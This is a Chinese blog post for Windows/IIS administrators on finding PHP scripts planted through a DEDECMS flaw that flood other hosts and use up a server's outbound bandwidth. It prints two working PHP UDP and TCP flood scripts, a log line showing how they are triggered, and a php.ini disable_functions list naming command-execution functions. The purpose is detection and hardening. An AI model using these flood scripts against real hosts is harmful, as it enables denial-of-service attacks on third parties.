如何查出用戶利用PHP代碼DDOS造成用光網(wǎng)絡(luò)帶寬
[重要通告]如您遇疑難雜癥,本站支持知識付費業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時間哦!
特征:
用PHP代碼調(diào)用sockets,直接用服務(wù)器的網(wǎng)絡(luò)攻擊別的IP,常見代碼如下:
[quote]
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
[/quote]
表現(xiàn)特征:
一打開IIS,服務(wù)器的流出帶寬就用光-----就是說服務(wù)器不斷向別人發(fā)包,這個情況和受到DDOS攻擊是不同的,DDOS是不斷收到大量數(shù)據(jù)包.
近期由于DEDECMS出現(xiàn)漏洞而導致大量服務(wù)器出現(xiàn)這個問題.
[color=Blue]如何快速找到這些站?
你可以打開日志
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打開今天時間的文件,
里面有類似這樣的記錄: [/color]
2011-12-02 05:11:41 123.62.6.3 23893 116.255.140.197 80 - - - - - Timer_ConnectionIdle -
2011-12-02 05:11:44 116.255.165.224 2938 116.255.140.197 80 HTTP/1.1 GET /plus/config_user.php?host=183.60.147.152&port=53&time=1800 - 5410000 Connection_Abandoned_By_AppPool 150_FreeHost_1
最后三項 5410000 Connection_Abandoned_By_AppPool 150_FreeHost_1
5410000就是這個站在IIS中的ID
150_FreeHost_1就是所在池
[color=Red]解決辦法:
1.按上述找到這個網(wǎng)站后停止它.或停止池,并重啟IIS.
2.在IP策略,或防火墻中,禁止所有udp向外發(fā)送 [/color]
3.也可以直接禁止上面的代碼,如改win\php.ini后重啟IIS
ignore_user_abort = On
(注意前面的;號要刪除)
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上
fsockopen,set_time_limit
但這樣會造成很多php程序都不正常.
=================================
近期已有新的基于TCP攻擊的PHPDDOS代碼如下:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
exit;
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time or $exec_time != 69){
break;
}
$fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}
?>
同樣,可以采有以下解決辦法:
1.也可以直接禁止上面的代碼,如改win\php.ini后重啟IIS
ignore_user_abort = On
(注意前面的;號要刪除)
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上
fsockopen,set_time_limit
但這樣會造成很多php程序都不正常.
2.在IP策略中禁止所有外訪的TCP數(shù)據(jù)包,但這樣會造成的采集功能無效;。
3.在服務(wù)器要用關(guān)鍵詞tcp:或udp:搜索所有php類文件,找到攻擊文件,刪除它。
問題未解決?付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信
所寫所說,是心之所感,思之所悟,行之所得;文當無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!